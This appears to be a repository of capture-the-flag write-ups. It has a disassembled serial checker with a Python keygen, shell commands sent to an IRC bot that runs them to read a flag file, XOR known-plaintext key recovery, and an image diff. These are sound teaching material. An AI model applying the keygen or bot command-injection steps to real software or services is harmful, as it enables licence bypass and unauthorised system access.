83 | 80483b8: 66 90 xchg %ax,%ax
84 | 80483ba: 66 90 xchg %ax,%ax
85 | 80483bc: 66 90 xchg %ax,%ax
86 | 80483be: 66 90 xchg %ax,%ax
87 |
88 | 080483c0 :
89 | 80483c0: b8 4b 99 04 08 mov $0x804994b,%eax
90 | 80483c5: 2d 48 99 04 08 sub $0x8049948,%eax
91 | 80483ca: 83 f8 06 cmp $0x6,%eax
92 | 80483cd: 77 01 ja 80483d0
93 | 80483cf: c3 ret
94 | 80483d0: b8 00 00 00 00 mov $0x0,%eax
95 | 80483d5: 85 c0 test %eax,%eax
96 | 80483d7: 74 f6 je 80483cf
97 | 80483d9: 55 push %ebp
98 | 80483da: 89 e5 mov %esp,%ebp
99 | 80483dc: 83 ec 18 sub $0x18,%esp
100 | 80483df: c7 04 24 48 99 04 08 movl $0x8049948,(%esp)
101 | 80483e6: ff d0 call *%eax
102 | 80483e8: c9 leave
103 | 80483e9: c3 ret
104 | 80483ea: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
105 |
106 | 080483f0 :
107 | 80483f0: b8 48 99 04 08 mov $0x8049948,%eax
108 | 80483f5: 2d 48 99 04 08 sub $0x8049948,%eax
109 | 80483fa: c1 f8 02 sar $0x2,%eax
110 | 80483fd: 89 c2 mov %eax,%edx
111 | 80483ff: c1 ea 1f shr $0x1f,%edx
112 | 8048402: 01 d0 add %edx,%eax
113 | 8048404: d1 f8 sar %eax
114 | 8048406: 75 01 jne 8048409
115 | 8048408: c3 ret
116 | 8048409: ba 00 00 00 00 mov $0x0,%edx
117 | 804840e: 85 d2 test %edx,%edx
118 | 8048410: 74 f6 je 8048408
119 | 8048412: 55 push %ebp
120 | 8048413: 89 e5 mov %esp,%ebp
121 | 8048415: 83 ec 18 sub $0x18,%esp
122 | 8048418: 89 44 24 04 mov %eax,0x4(%esp)
123 | 804841c: c7 04 24 48 99 04 08 movl $0x8049948,(%esp)
124 | 8048423: ff d2 call *%edx
125 | 8048425: c9 leave
126 | 8048426: c3 ret
127 | 8048427: 89 f6 mov %esi,%esi
128 | 8048429: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
129 |
130 | 08048430 <__do_global_dtors_aux>:
131 | 8048430: 80 3d 48 99 04 08 00 cmpb $0x0,0x8049948
132 | 8048437: 75 13 jne 804844c <__do_global_dtors_aux+0x1c>
133 | 8048439: 55 push %ebp
134 | 804843a: 89 e5 mov %esp,%ebp
135 | 804843c: 83 ec 08 sub $0x8,%esp
136 | 804843f: e8 7c ff ff ff call 80483c0
137 | 8048444: c6 05 48 99 04 08 01 movb $0x1,0x8049948
138 | 804844b: c9 leave
139 | 804844c: f3 c3 repz ret
140 | 804844e: 66 90 xchg %ax,%ax
141 |
142 | 08048450 :
143 | 8048450: a1 30 98 04 08 mov 0x8049830,%eax
144 | 8048455: 85 c0 test %eax,%eax
145 | 8048457: 74 1f je 8048478
146 | 8048459: b8 00 00 00 00 mov $0x0,%eax
147 | 804845e: 85 c0 test %eax,%eax
148 | 8048460: 74 16 je 8048478
149 | 8048462: 55 push %ebp
150 | 8048463: 89 e5 mov %esp,%ebp
151 | 8048465: 83 ec 18 sub $0x18,%esp
152 | 8048468: c7 04 24 30 98 04 08 movl $0x8049830,(%esp)
153 | 804846f: ff d0 call *%eax
154 | 8048471: c9 leave
155 | 8048472: e9 79 ff ff ff jmp 80483f0
156 | 8048477: 90 nop
157 | 8048478: e9 73 ff ff ff jmp 80483f0
158 |
159 | 0804847d :
160 | 804847d: 55 push %ebp
161 | 804847e: 89 e5 mov %esp,%ebp
162 | 8048480: 83 e4 f0 and $0xfffffff0,%esp
163 | 8048483: 83 ec 30 sub $0x30,%esp
164 | 8048486: c7 04 24 80 86 04 08 movl $0x8048680,(%esp)
165 | 804848d: e8 ae fe ff ff call 8048340
166 | 8048492: 8d 44 24 1c lea 0x1c(%esp),%eax
167 | 8048496: 89 44 24 04 mov %eax,0x4(%esp)
168 | 804849a: c7 04 24 c9 86 04 08 movl $0x80486c9,(%esp)
169 | 80484a1: e8 ca fe ff ff call 8048370 <__isoc99_scanf@plt>
170 | 80484a6: 8b 44 24 1c mov 0x1c(%esp),%eax
171 | 80484aa: 85 c0 test %eax,%eax
172 | 80484ac: 7f 16 jg 80484c4
173 | 80484ae: c7 04 24 cc 86 04 08 movl $0x80486cc,(%esp)
174 | 80484b5: e8 86 fe ff ff call 8048340
175 | 80484ba: b8 00 00 00 00 mov $0x0,%eax
176 | 80484bf: e9 29 01 00 00 jmp 80485ed
177 | 80484c4: 8b 44 24 1c mov 0x1c(%esp),%eax
178 | 80484c8: 89 44 24 04 mov %eax,0x4(%esp)
179 | 80484cc: c7 04 24 d9 86 04 08 movl $0x80486d9,(%esp)
180 | 80484d3: e8 58 fe ff ff call 8048330
181 | 80484d8: c7 04 24 f4 86 04 08 movl $0x80486f4,(%esp)
182 | 80484df: e8 5c fe ff ff call 8048340
183 | 80484e4: c7 44 24 18 00 00 00 movl $0x0,0x18(%esp)
184 | 80484eb: 00
185 | 80484ec: c7 44 24 14 00 00 00 movl $0x0,0x14(%esp)
186 | 80484f3: 00
187 | 80484f4: c7 44 24 10 00 00 00 movl $0x0,0x10(%esp)
188 | 80484fb: 00
189 | 80484fc: 8d 44 24 10 lea 0x10(%esp),%eax
190 | 8048500: 89 44 24 0c mov %eax,0xc(%esp)
191 | 8048504: 8d 44 24 14 lea 0x14(%esp),%eax
192 | 8048508: 89 44 24 08 mov %eax,0x8(%esp)
193 | 804850c: 8d 44 24 18 lea 0x18(%esp),%eax
194 | 8048510: 89 44 24 04 mov %eax,0x4(%esp)
195 | 8048514: c7 04 24 19 87 04 08 movl $0x8048719,(%esp)
196 | 804851b: e8 50 fe ff ff call 8048370 <__isoc99_scanf@plt>
197 | 8048520: 8b 44 24 1c mov 0x1c(%esp),%eax
198 | 8048524: 85 c0 test %eax,%eax
199 | 8048526: 7e 18 jle 8048540
200 | 8048528: 8b 44 24 18 mov 0x18(%esp),%eax
201 | 804852c: 85 c0 test %eax,%eax
202 | 804852e: 7e 10 jle 8048540
203 | 8048530: 8b 44 24 14 mov 0x14(%esp),%eax
204 | 8048534: 85 c0 test %eax,%eax
205 | 8048536: 7e 08 jle 8048540
206 | 8048538: 8b 44 24 10 mov 0x10(%esp),%eax
207 | 804853c: 85 c0 test %eax,%eax
208 | 804853e: 7f 16 jg 8048556
209 | 8048540: c7 04 24 22 87 04 08 movl $0x8048722,(%esp)
210 | 8048547: e8 f4 fd ff ff call 8048340
211 | 804854c: b8 00 00 00 00 mov $0x0,%eax
212 | 8048551: e9 97 00 00 00 jmp 80485ed
213 | 8048556: 8b 54 24 1c mov 0x1c(%esp),%edx
214 | 804855a: 89 d0 mov %edx,%eax
215 | 804855c: c1 e0 02 shl $0x2,%eax
216 | 804855f: 01 d0 add %edx,%eax
217 | 8048561: 01 c0 add %eax,%eax
218 | 8048563: 83 c0 2a add $0x2a,%eax
219 | 8048566: c1 e0 04 shl $0x4,%eax
220 | 8048569: 89 44 24 24 mov %eax,0x24(%esp)
221 | 804856d: 8b 44 24 1c mov 0x1c(%esp),%eax
222 | 8048571: 69 c0 b6 07 00 00 imul $0x7b6,%eax,%eax
223 | 8048577: 05 d2 71 01 00 add $0x171d2,%eax
224 | 804857c: 89 44 24 20 mov %eax,0x20(%esp)
225 | 8048580: c7 44 24 2c 18 02 00 movl $0x218,0x2c(%esp)
226 | 8048587: 00
227 | 8048588: c7 44 24 28 00 00 00 movl $0x0,0x28(%esp)
228 | 804858f: 00
229 | 8048590: eb 0f jmp 80485a1
230 | 8048592: 83 44 24 2c 05 addl $0x5,0x2c(%esp)
231 | 8048597: 83 6c 24 2c 03 subl $0x3,0x2c(%esp)
232 | 804859c: 83 44 24 28 01 addl $0x1,0x28(%esp)
233 | 80485a1: 83 7c 24 28 09 cmpl $0x9,0x28(%esp)
234 | 80485a6: 7e ea jle 8048592
235 | 80485a8: 8b 44 24 1c mov 0x1c(%esp),%eax
236 | 80485ac: 01 44 24 2c add %eax,0x2c(%esp)
237 | 80485b0: 8b 44 24 18 mov 0x18(%esp),%eax
238 | 80485b4: 39 44 24 24 cmp %eax,0x24(%esp)
239 | 80485b8: 75 22 jne 80485dc
240 | 80485ba: 8b 44 24 14 mov 0x14(%esp),%eax
241 | 80485be: 39 44 24 20 cmp %eax,0x20(%esp)
242 | 80485c2: 75 18 jne 80485dc
243 | 80485c4: 8b 44 24 10 mov 0x10(%esp),%eax
244 | 80485c8: 39 44 24 2c cmp %eax,0x2c(%esp)
245 | 80485cc: 75 0e jne 80485dc
246 | 80485ce: c7 04 24 33 87 04 08 movl $0x8048733,(%esp)
247 | 80485d5: e8 66 fd ff ff call 8048340
248 | 80485da: eb 0c jmp 80485e8
249 | 80485dc: c7 04 24 40 87 04 08 movl $0x8048740,(%esp)
250 | 80485e3: e8 58 fd ff ff call 8048340
251 | 80485e8: b8 00 00 00 00 mov $0x0,%eax
252 | 80485ed: c9 leave
253 | 80485ee: c3 ret
254 | 80485ef: 90 nop
255 |
256 | 080485f0 <__libc_csu_init>:
257 | 80485f0: 55 push %ebp
258 | 80485f1: 57 push %edi
259 | 80485f2: 31 ff xor %edi,%edi
260 | 80485f4: 56 push %esi
261 | 80485f5: 53 push %ebx
262 | 80485f6: e8 b5 fd ff ff call 80483b0 <__x86.get_pc_thunk.bx>
263 | 80485fb: 81 c3 25 13 00 00 add $0x1325,%ebx
264 | 8048601: 83 ec 1c sub $0x1c,%esp
265 | 8048604: 8b 6c 24 30 mov 0x30(%esp),%ebp
266 | 8048608: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi
267 | 804860e: e8 e1 fc ff ff call 80482f4 <_init>
268 | 8048613: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax
269 | 8048619: 29 c6 sub %eax,%esi
270 | 804861b: c1 fe 02 sar $0x2,%esi
271 | 804861e: 85 f6 test %esi,%esi
272 | 8048620: 74 27 je 8048649 <__libc_csu_init+0x59>
273 | 8048622: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
274 | 8048628: 8b 44 24 38 mov 0x38(%esp),%eax
275 | 804862c: 89 2c 24 mov %ebp,(%esp)
276 | 804862f: 89 44 24 08 mov %eax,0x8(%esp)
277 | 8048633: 8b 44 24 34 mov 0x34(%esp),%eax
278 | 8048637: 89 44 24 04 mov %eax,0x4(%esp)
279 | 804863b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4)
280 | 8048642: 83 c7 01 add $0x1,%edi
281 | 8048645: 39 f7 cmp %esi,%edi
282 | 8048647: 75 df jne 8048628 <__libc_csu_init+0x38>
283 | 8048649: 83 c4 1c add $0x1c,%esp
284 | 804864c: 5b pop %ebx
285 | 804864d: 5e pop %esi
286 | 804864e: 5f pop %edi
287 | 804864f: 5d pop %ebp
288 | 8048650: c3 ret
289 | 8048651: eb 0d jmp 8048660 <__libc_csu_fini>
290 | 8048653: 90 nop
291 | 8048654: 90 nop
292 | 8048655: 90 nop
293 | 8048656: 90 nop
294 | 8048657: 90 nop
295 | 8048658: 90 nop
296 | 8048659: 90 nop
297 | 804865a: 90 nop
298 | 804865b: 90 nop
299 | 804865c: 90 nop
300 | 804865d: 90 nop
301 | 804865e: 90 nop
302 | 804865f: 90 nop
303 |
304 | 08048660 <__libc_csu_fini>:
305 | 8048660: f3 c3 repz ret
306 |
307 | Disassembly of section .fini:
308 |
309 | 08048664 <_fini>:
310 | 8048664: 53 push %ebx
311 | 8048665: 83 ec 08 sub $0x8,%esp
312 | 8048668: e8 43 fd ff ff call 80483b0 <__x86.get_pc_thunk.bx>
313 | 804866d: 81 c3 b3 12 00 00 add $0x12b3,%ebx
314 | 8048673: 83 c4 08 add $0x8,%esp
315 | 8048676: 5b pop %ebx
316 | 8048677: c3 ret
317 |
--------------------------------------------------------------------------------
/serial_verifier/serial.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/serial_verifier/serial.exe
--------------------------------------------------------------------------------
/serial_verifier/serial_verifier.md:
--------------------------------------------------------------------------------
1 | serial verifier
2 | ===============
3 |
4 | Flag: **why_so_serial**
5 |
6 | 
7 |
8 | The challenge flavortext says "Try to validate the nice little piece of
9 | code. You will get your flag here: Serial verifier" and links to:
10 |
11 | * [linux](serial "Linux executable version of serial verifier")
12 | * [windows](serial.exe "Windows executable version of serial verifier")
13 |
14 | The serial verifier is a web form that shows you your session number and asks
15 | you to submit the corresponding serial number for that session:
16 |
17 | 
18 |
19 | The linked executables verify the web form data. Let's run one of them to get a
20 | feel for how it works:
21 |
22 | $ ./serial
23 | Welcome to the Serial Verifier!
24 | Please insert your personal Session ID:
25 | 1509
26 | Thanks I got the ID 1509
27 | I would like to know your serial now
28 | asdf
29 | Sorry not valid!
30 |
31 | We'll need to reverse the serial generation algorithm from the assembly for one
32 | of the executables. Running `strings` against the ELF executable, we get:
33 |
34 | $ strings serial
35 | ...
36 | Welcome to the Serial Verifier!
37 | Please insert your personal Session ID:
38 | Not a number
39 | Thanks I got the ID %d
40 | I would like to know your serial now
41 | %d-%d-%d
42 | Sorry not valid!
43 | You did it!
44 | Wrong Code!
45 | ...
46 |
47 | It looks like the format of the serial number might be `%d-%d-%d`.
48 |
49 | We can look at the dissambly with `objdump -d`. [Here](serial.dump "serial
50 | disassembly") is the full disassembly for the ELF executable. Below is part of
51 | the disassembly for `main`, with annotations to the right walking through the
52 | serial number generation algorithm:
53 |
54 | :
55 | ...
56 | call 8048370 <__isoc99_scanf@plt> # Scan in 3 numbers.
57 | mov 0x1c(%esp),%eax # Is var 1 > 0?
58 | test %eax,%eax
59 | jle 8048540
60 | mov 0x18(%esp),%eax # Is var 2 > 0?
61 | test %eax,%eax
62 | jle 8048540
63 | mov 0x14(%esp),%eax # Is var 3 > 0?
64 | test %eax,%eax
65 | jle 8048540 # Is session # > 0?
66 | mov 0x10(%esp),%eax
67 | test %eax,%eax
68 | jg 8048556
69 | movl $0x8048722,(%esp)
70 | call 8048340
71 | mov $0x0,%eax
72 | jmp 80485ed
73 | mov 0x1c(%esp),%edx # Take session, move it into edx. We call it s1.
74 | mov %edx,%eax # Next 3 lines multiply s1 by 10:
75 | shl $0x2,%eax # x = s1 << 2
76 | add %edx,%eax # s1 = s1 + x
77 | add %eax,%eax # s1 = s1 + s1
78 | add $0x2a,%eax # Add 0x2a to s1. Net result: s1 = (0xa * session) + 0x2a.
79 | shl $0x4,%eax # Shift left by 0x4, same as multiplying by 0x10.
80 | mov %eax,0x24(%esp) # Save as s1, at 0x24(%esp)
81 | mov 0x1c(%esp),%eax # Load session into %esp again.
82 | imul $0x7b6,%eax,%eax # s2 = session * 0x7b6
83 | add $0x171d2,%eax # s2 = session * 0x7b6 + 0x171d2
84 | mov %eax,0x20(%esp) # Save as s2, at 0x20(%esp)
85 | movl $0x218,0x2c(%esp) # s3 = 0x218
86 | movl $0x0,0x28(%esp) # Set up a counter for a loop: i = 0.
87 | jmp 80485a1 # Loop:
88 | addl $0x5,0x2c(%esp) # s3 += 5
89 | subl $0x3,0x2c(%esp) # s3 -= 3
90 | addl $0x1,0x28(%esp) # i++
91 | cmpl $0x9,0x28(%esp) # if i <= 9:
92 | jle 8048592 # Go back to Loop
93 | mov 0x1c(%esp),%eax # Move session into %eax.
94 | add %eax,0x2c(%esp) # s3 += session
95 | mov 0x18(%esp),%eax # Does var 1 == s1?
96 | cmp %eax,0x24(%esp)
97 | jne 80485dc
98 | mov 0x14(%esp),%eax # Does var 2 == s2?
99 | cmp %eax,0x20(%esp)
100 | jne 80485dc
101 | mov 0x10(%esp),%eax # Does var 3 == s3?
102 | cmp %eax,0x2c(%esp)
103 | jne 80485dc
104 | movl $0x8048733,(%esp) # Yes, print flag.
105 | call 8048340
106 | ...
107 |
108 | Here is a Python script that executes the same algorithm:
109 |
110 | import sys
111 |
112 | session = int(sys.argv[1])
113 |
114 | s1 = 0x10 * (0xa * session + 0x2a)
115 | s2 = 0x7b6 * session + 0x171d2
116 | s3 = 0x218
117 | for i in range(10):
118 | s3 += 0x5
119 | s3 -= 0x3
120 | s3 += session
121 |
122 | print "%d-%d-%d" % (s1, s2, s3)
123 |
124 | Using this script, we can generate the serial number for session 1509:
125 |
126 | $ python serial.py 1509
127 | 242112-3073440-2065
128 |
129 | Supplying that number in the web form reveals the flag, which is
130 | `why_so_serial`.
131 |
132 | [« Return to challenge board](../README.md "Return to challenge board")
133 |
--------------------------------------------------------------------------------
/sweetie/images/sweetie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/sweetie/images/sweetie.png
--------------------------------------------------------------------------------
/sweetie/sweetie.md:
--------------------------------------------------------------------------------
1 | sweetie
2 | =======
3 |
4 | Flag: **set_phasers_to_hug**
5 |
6 | 
7 |
8 | The challenge flavortext says "/msg SweetieBot > echo hi", implying that we
9 | should interact with an IRC bot. Given that the CTF had an IRC channel on
10 | [freenode](http://freenode.net/ "freenode IRC network"), that seems like a good
11 | network to try:
12 |
13 | -!- Irssi: Starting query in freenode with SweetieBot
14 | 17:22 > echo hi
15 | 17:22 hi
16 |
17 | SweetieBot is echoing what I am saying. Is `echo` just the typical shell
18 | builtin?
19 |
20 | 15:09 > ls -al /
21 | 15:09 total 56
22 | 15:09 drwxr-xr-x 10 1001 1001 0 Oct 10 01:18 .
23 | 15:09 drwxr-xr-x 10 1001 1001 0 Oct 10 01:18 ..
24 | 15:09 11 more lines ( http://sprunge.us/PHEc )
25 |
26 | Looks like it. The pastebin contains:
27 |
28 | total 56
29 | drwxr-xr-x 10 1001 1001 0 Oct 10 01:18 .
30 | drwxr-xr-x 10 1001 1001 0 Oct 10 01:18 ..
31 | drwxr-xr-x 2 1001 1001 0 Oct 10 01:18 bin
32 | drwxr-xr-x 2 1001 1001 0 Oct 10 01:18 dev
33 | drwxr-xr-x 3 1001 1001 0 Oct 10 01:18 etc
34 | -rw-r--r-- 1 0 0 25 Oct 10 01:18 flag
35 | -rwxr-xr-x 1 1001 1001 397 Oct 10 01:18 init
36 | drwxr-xr-x 2 1001 1001 0 Oct 10 01:18 lib
37 | dr-xr-xr-x 24 0 0 0 Oct 10 01:18 proc
38 | drwxr-xr-x 2 1001 1001 0 Oct 10 01:18 root
39 | -rw-r--r-- 1 1001 1001 45640 Oct 10 01:18 sweetiebot.png
40 | drwxr-xr-x 2 1001 1001 0 Oct 10 01:18 tmp
41 | drwxr-xr-x 4 1001 1001 0 Oct 10 01:18 usr
42 |
43 | Let's check out that `flag` file:
44 |
45 | 15:09 > cat /flag
46 | 15:09 flag{set_phasers_to_hug}
47 |
48 | The flag is thus `set_phasers_to_hug`.
49 |
50 | [« Return to challenge board](../README.md "Return to challenge board")
51 |
--------------------------------------------------------------------------------
/txt_securer/images/txt_securer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/txt_securer/images/txt_securer.png
--------------------------------------------------------------------------------
/txt_securer/txt_securer.md:
--------------------------------------------------------------------------------
1 | txt_securer
2 | ===========
3 |
4 | Flag: **can_you_believe_xor_provides_perfect_security?**
5 |
6 | 
7 |
8 | The challenge flavortext says "Intercepted some messages encrypted using this
9 | [high-tech algorithm](txt_securer.py "txt_securer Python script")" and provides
10 | these messages:
11 |
12 | > msg1:
13 | > This message is not important, so I send it twice encrypted and plain.
14 | >
15 | > msg1_enc:
16 | > XOvjumbdDj+Ny3Dz/dicO2bs/ukv3RsjjN52+Kmdz2hno8PpNdUFKN7DY7apxoZ4baPvpyXCEjyKz3O2vN+LO3jv66Aong==
17 | >
18 | > msg2_enc:
19 | > Ruz96TLYDmyXx2f5r8WOdXyj56w1wworm4pg/6nZz29g5qqvKtEMdt6Icfq81pR4ae3VsCnFNC6bxn7zq9SwY2fx1bk03x0lms9kya3UnX1t4P6WNdUIOYzDY+/izM01
20 | >
21 | > msg3_enc:
22 | > QOb4rGbZGGyKwn7kuZGCfnvw664jnEs4kYp0+bPXmmhto+W8NJAEPJHEcvipnc95ffeqoSOQCC2QjWO2r9SOfyj34qA1kAYpjdl28biRjnVx9OuwaA==
23 |
24 | The linked script shows that the encryption and decryption mechanisms are just
25 | an XOR with a repeating 16-byte key:
26 |
27 | import base64
28 | import os
29 |
30 | def xor(data, key):
31 | return "".join(map(lambda (x,y): chr(ord(x) ^ ord(y)), zip(data, key*(len(data)/len(key)+1))))
32 |
33 | keylen = 16
34 |
35 | def generate_key():
36 | return os.urandom(keylen)
37 |
38 | def encrypt(data, key):
39 | return base64.b64encode(xor(data, key))
40 |
41 | def decrypt(data, key):
42 | return xor(base64.b64decode(data), key)
43 |
44 | We have both a message `msg1` and the resulting ciphertext `msg1_enc`.
45 |
46 | We know that `msg1_enc` = `msg1 ^ key`. Thus:
47 |
48 | msg1_enc ^ msg1 = msg1 ^ key ^ msg1 = key
49 |
50 | If we XOR `msg1` and `msg1_enc1`, we can recover the key to decrypt the
51 | remaining messages:
52 |
53 | msg1 = "This message is not important, so I send it twice encrypted and plain."
54 | msg1_enc = "XOvjumbdDj+Ny3Dz/dicO2bs/ukv3RsjjN52+Kmdz2hno8PpNdUFKN7DY7apxoZ4baPvpyXCEjyKz3O2vN+LO3jv66Aong=="
55 |
56 | key = xor(base64.b64decode(msg1_enc), msg1)
57 | key = key[:16]
58 |
59 | msg2_enc = "Ruz96TLYDmyXx2f5r8WOdXyj56w1wworm4pg/6nZz29g5qqvKtEMdt6Icfq81pR4ae3VsCnFNC6bxn7zq9SwY2fx1bk03x0lms9kya3UnX1t4P6WNdUIOYzDY+/izM01"
60 | msg3_enc = "QOb4rGbZGGyKwn7kuZGCfnvw664jnEs4kYp0+bPXmmhto+W8NJAEPJHEcvipnc95ffeqoSOQCC2QjWO2r9SOfyj34qA1kAYpjdl28biRjnVx9OuwaA=="
61 |
62 | print decrypt(msg2_enc, key)
63 | print decrypt(msg3_enc, key)
64 |
65 | Running the revised `txt_securer.py`, we get:
66 |
67 | $ python txt_securer.py
68 | Now the important message with the flag: "flag{can_you_believe_xor_provides_perfect_security?}".
69 | Here is third message, to confuse our oponent, but he can't read this message anyway.
70 |
71 | The flag is thus `can_you_believe_xor_provides_perfect_security?`.
72 |
73 | [« Return to challenge board](../README.md "Return to challenge board")
74 |
--------------------------------------------------------------------------------
/txt_securer/txt_securer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import base64
3 | import os
4 | def xor(data, key):
5 | return "".join(map(lambda (x,y): chr(ord(x) ^ ord(y)), zip(data, key*(len(data)/len(key)+1))))
6 |
7 | keylen = 16
8 |
9 | def generate_key():
10 | return os.urandom(keylen)
11 |
12 | def encrypt(data, key):
13 | return base64.b64encode(xor(data, key))
14 |
15 | def decrypt(data, key):
16 | return xor(base64.b64decode(data), key)
17 |
--------------------------------------------------------------------------------
/xoxo/images/xoxo-diff.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/xoxo/images/xoxo-diff.png
--------------------------------------------------------------------------------
/xoxo/images/xoxo-message1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/xoxo/images/xoxo-message1.png
--------------------------------------------------------------------------------
/xoxo/images/xoxo-message2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/xoxo/images/xoxo-message2.png
--------------------------------------------------------------------------------
/xoxo/images/xoxo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/xoxo/images/xoxo.png
--------------------------------------------------------------------------------
/xoxo/xoxo.md:
--------------------------------------------------------------------------------
1 | xoxo
2 | ====
3 |
4 | Flag: **meet_me_at_the_gates_at_midnight**
5 |
6 | 
7 |
8 | The challenge flavortext says:
9 |
10 | > My love,
11 |
12 | > I am under constant observation from my parents, so I cannot speak clear.
13 |
14 | > Here are two random images. You know what to do.
15 |
16 | and links to two PNGs:
17 |
18 | * [message1.png](images/xoxo-message1.png "message1.png")
19 | * [message2.png](images/xoxo-message2.png "message2.png")
20 |
21 | 
22 | 
23 |
24 | Given the title of the challenge, it seems like we should XOR or
25 | otherwise diff these two images. Using the ImageMagick command line
26 | utility `compare` to diff the images:
27 |
28 | compare xoxo-message1.png xoxo-message2.png -compose src diff.png
29 |
30 | We get this resulting image diff:
31 |
32 | 
33 |
34 | The flag is thus `meet_me_at_the_gates_at_midnight`.
35 |
36 | [« Return to challenge board](../README.md "Return to challenge board")
37 |
--------------------------------------------------------------------------------